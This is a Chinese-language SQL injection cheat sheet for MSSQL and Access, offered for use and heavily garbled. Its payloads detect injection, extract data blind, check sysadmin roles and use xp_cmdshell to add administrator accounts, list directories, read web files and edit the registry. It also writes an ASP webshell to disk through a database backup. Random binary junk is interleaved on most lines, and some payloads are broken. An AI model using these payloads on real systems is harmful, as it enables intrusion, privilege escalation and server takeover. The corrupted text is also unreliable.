1.判断是否有注入;and 1=1 ;and 1=2 �Rg<y8~|'}
2.初步判断是否是mssql ;and user>0 N4�!YaQQ;}
�Z��i$a��6
3.注入参数是字符'and [查询条件] and ''=' *Au4q<���
;�M��8N%�
4.搜索时没过滤参数的'and [查询条件] and '%25'=' vu�uID2�4:
W5$jIQ}B�w
5.判断数据库系统 Z4}Yw{=f�
$�J[h(>-X�
;and (select count(*) from sysobjects)>0 mssql FO�B�9CsMe
1>b��kVA��
;and (select count(*) from msysobjects)>0 access m^U\l�9L�E
)8ctNp�Q�t
9/D+�6hJ]:
go��6��Hb>
6.猜数据库 ;and (select Count(*) from [数据库名])>0 a�~�O�C��o
,�nMLu�a�\
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 ,f$A5R��N
���Qz{:��m
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 c��G?RisSZ
��e�x �$d~
9.(1)猜字段的ascii值(access) ��h(d�<':|
zd��yS"H}�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 6h}f^eJ:K,
^qiTO`lg��
(2)猜字段的ascii值(mssql) LB? e�vewu
J\_t�igd��
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �(o�{Q�Sk\
vb9G_�Pf�z
10.测试权限结构(mssql) .zlUN0oe��
;� z�:}�OD
h_?D%b~�5�
�����h�\C�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- |�=l�;UqB�
-�DX|�[70
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- >T.U\�,om7
e.\�d7�_T+
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- H�h�$D:Z�O
$"���J+3mO
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- fcr\XCG7�U
{��qx}f^WV
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �+q)
^p�CC
r4P��m
�i
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �3?�B�q�((
cli���P+#�
;and 1=(select IS_MEMBER('db_owner'));-- n1��DD�+�@
j?/T�7�a^
W)<us?5Ec5
*�M/3 �1qI
11.添加mssql和系统的帐户 FlD��
!�?�
�G�pN tvo~
;exec master.dbo.sp_addlogin username;-- \4~uop,Nb+
;exec master.dbo.sp_password null,username,password;-- �ff?:_q+.N
65�=i`�!�f
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- N�#C,�_ k�
&D���qg�<U
;exec master.dbo.xp_cmdshell 'net user username password H��~�J�#!3
AmRppbj/wO
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- Th`Ip�x�V
/JtKn*?}:>
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ��\W(�C�=e
hn�)��mNb!
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- a5?R�j~h!<
Pf]6'?�k�Q
��3�VB{�Qj
��$eX��;
2
12.(1)遍历目录 0#G&8*�FMN
m-5Dbx!�j�
;create table dirs(paths varchar(100), id int) zY�Yc#�N�/
E�>�K�V1P�
;insert dirs exec master.dbo.xp_dirtree 'c:\' I�BQm�m(+v
��Ts|&�_|�
;and (select top 1 paths from dirs)>0 syv6" 2Z'B
Xko[Z;4v8'
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) K�)��s��O�
(3%Nudkw�T
���NL0X =i
"npj%O<b�d
(2)遍历目录 )�<1��M�'2
]�5Y�G*sD4
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ��lk%r��E
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 qd�L;Ii<Y0
}W�n6�r_:�
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 h�R[Q�du6r
Q^�DKKp���
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 %S�]5wR6;_
f<!eJO:�<'
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 z�RD{"uq�i
��z4&|~-m,
1
B��Anf9
y2�T�JDb1
13.mssql中的存储过程 xx#�;�)]WT
9%$4�Ux�*q
xp_regenumvalues 注册表根键, 子键 �X[(u]h�`�
<�S�6|$7{1
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 �(�YGJw?]�
�|TkMr��j0
xp_regread 根键,子键,键值名 ��FlrLXTx0
�Yr��,e7da
;exec xp_regread g�&�\A�1H
Z�[�FSy-;"
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 kZ[E493�bV
v5;��c}��n
xp_regwrite 根键,子键, 值名, 值类型, 值 |bO��}�|X
[q?��{�e1�
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �Q�A�p�il
0�V}%'Ec<e
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 ����[��L{q
B7fURL
Rqr
xp_regdeletevalue 根键,子键,值名 Z<0M_q9?MO
�R8�W{[@
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 Mf<P�ms\�F
�|j�U�/�R�
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �egYJ.ZzF0
��C�^2Tq�l
\.�POb5]p0
a��HXd1\6m
14.mssql的backup创建webshell tOn/r@Fd^E
�2�Rc�#�{A
use model Oq�|�RMl��
H .JA�)*b-
create table cmd(str image); ,&G���n7[<
}{��n[_:[7
insert into cmd(str) values (''); *=$Jv1"Q
+
b�smZR(EnU
backup database model to disk='c:\l.asp'; �C�z+`C9#�
�X) owj7U;
) ��'j7Ra
]KA|};>�ow
15.mssql内置函数 ^{DXin 1O`
w�+fsw@dK&
;and (select @@version)>0 获得Windows的版本号 P bj��&l0C
N8@Fj��!Zi
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �==RY��f*d
~dkS-6�q~Q
;and (select user_name())>0 爆当前系统的连接用户 Z�]@my,+Z;
ey�_3ah3x�
;and (select db_name())>0 得到当前连接的数据库 ,ZHI�XylZ�
7Y�V}F9h4�
�rUc2�'C�t
(OLj�E�]9;
16.简洁的webshell J2f}{!�b+I
9f\Lon4lX
use model _U?��
�� �
'�P0:�1�">
create table cmd(str image); �`�Wb�oM\u
Rp^k�D ,�*
insert into cmd(str) values (''); h#�d��p_#�
*�?zm�o�@-
backup database model to disk='g:\wwwtest\l.asp';
